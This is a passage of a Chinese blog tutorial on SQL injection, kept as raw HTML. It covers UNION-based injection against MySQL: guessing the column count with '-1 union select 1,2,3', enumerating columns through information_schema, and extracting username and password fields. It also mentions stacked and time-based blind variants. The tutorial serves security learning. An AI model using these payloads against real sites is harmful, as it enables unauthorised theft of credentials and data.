<code class="sql plain">+</code><code class="sql comments">----------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| master |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| students |</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">+</code><code class="sql comments">----------+</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">2 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
3)</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_130199">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
<div class="line number5 index4 alt2">
5</div>
<div class="line number6 index5 alt1">
6</div>
<div class="line number7 index6 alt2">
7</div>
<div class="line number8 index7 alt1">
8</div>
<div class="line number9 index8 alt2">
9</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">mysql> </code><code class="sql keyword">select</code> <code class="sql keyword">name</code> <code class="sql keyword">from</code> <code class="sql plain">students </code><code class="sql keyword">where</code> <code class="sql plain">id = -1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">column_name </code><code class="sql keyword">from</code> <code class="sql plain">information_schema.columns </code><code class="sql keyword">where</code> <code class="sql plain">table_name = </code><code class="sql string">'students'</code> <code class="sql plain">; //列名</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">+</code><code class="sql comments">------+</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">| </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">+</code><code class="sql comments">------+</code>
</div>
<div class="line number5 index4 alt2">
<code class="sql plain">| id |</code>
</div>
<div class="line number6 index5 alt1">
<code class="sql plain">| </code><code class="sql keyword">name</code> <code class="sql plain">|</code>
</div>
<div class="line number7 index6 alt2">
<code class="sql plain">| age |</code>
</div>
<div class="line number8 index7 alt1">
<code class="sql plain">+</code><code class="sql comments">------+</code>
</div>
<div class="line number9 index8 alt2">
<code class="sql plain">3 </code><code class="sql keyword">rows</code> <code class="sql color1">in</code> <code class="sql keyword">set</code> <code class="sql plain">(0.00 sec)</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
UNION 操作符用于合并两个或多个 SELECT 语句的结果集。请注意,UNION 内部的 SELECT 语句必须拥有相同数量的列。列也必须拥有相似的数据类型。同时,每条 SELECT 语句中的列的顺序必须相同。</p>
<p>
举个例子,还以最开始的 OWASP 为基础,返回了两个值分别是 first_name 和 sur_name,可想而知,服务器在返回数据库的查询结果时,就会把结果中的第一个值和第二个值传给 first_name 和 sur_name,多了或少了,都会引起报错。</p>
<p>
所以你如果想要使用union查询来进行注入,你首先要猜测后端查询语句中查询了多少列,哪些列可以回显给用户。</p>
<p>
猜测列数</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_808925">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
<div class="line number2 index1 alt1">
2</div>
<div class="line number3 index2 alt2">
3</div>
<div class="line number4 index3 alt1">
4</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1</code>
</div>
<div class="line number2 index1 alt1">
<code class="sql plain">-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2</code>
</div>
<div class="line number3 index2 alt2">
<code class="sql plain">-1 </code><code class="sql keyword">union</code> <code class="sql keyword">select</code> <code class="sql plain">1,2,3</code>
</div>
<div class="line number4 index3 alt1">
<code class="sql plain">//直到页面正常显示</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
比如这条语句</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_314743">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">-1 </code><code class="sql keyword">UNION</code> <code class="sql keyword">SELECT</code> <code class="sql plain">1,2,3,4</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
如果显示的值为3和4,表示该查询结果中有四列,并且第三列和第四列是有用的。则相应的构造union语句如下</p>
<div class="jb51code">
<div>
<div class="syntaxhighlightersql" id="highlighter_546741">
<div class="toolbar">
<span>?</span>
</div>
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr>
<td class="gutter">
<div class="line number1 index0 alt2">
1</div>
</td>
<td class="code">
<div class="container">
<div class="line number1 index0 alt2">
<code class="sql plain">-1 </code><code class="sql keyword">UNION</code> <code class="sql keyword">SELECT</code> <code class="sql plain">1,2,username,</code><code class="sql keyword">password</code> <code class="sql keyword">FROM</code> <code class="sql keyword">table</code>
</div>
</div>
</td>
</tr></tbody></table>
</div>
</div>
<div class="codetool" id="codetool">
<div class="code_n">
<textarea></textarea>
</div>
</div>
</div>
<p>
<span><strong>小结一下</strong></span></p>
<p>
SQL 注入大概有5种,还有两种分别是 Stacked_queries(基于堆栈)和 Time-based blind(时间延迟),堆栈就是多语句查询,用 ‘;' 把语句隔开,和 union 一样;时间延迟就是利用 sleep() 函数让数据库延迟执行,偷数据的速度很慢。(还有一个第六种,内联注入,但和前面涉及的内容有所重叠,就不单独来讨论了)</p>
<p>
引用说明,自己之前研究 SQL 注入的时候,也是一点一点摸索的,本博客的大部分内容是来自于公司内网的服务器中(公司定期考核,看你都干了什么)。当时因为是内网,就没有做引用,现在想找到这些引用的文章也很困难,见谅。</p>
<p>
好了,以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作能带来一定的帮助,如果有疑问大家可以留言交流。</p>
<p>
原文链接:http://yuren.space/blog/2016/10/01/SQL注入详解/</p>
頁:
[1]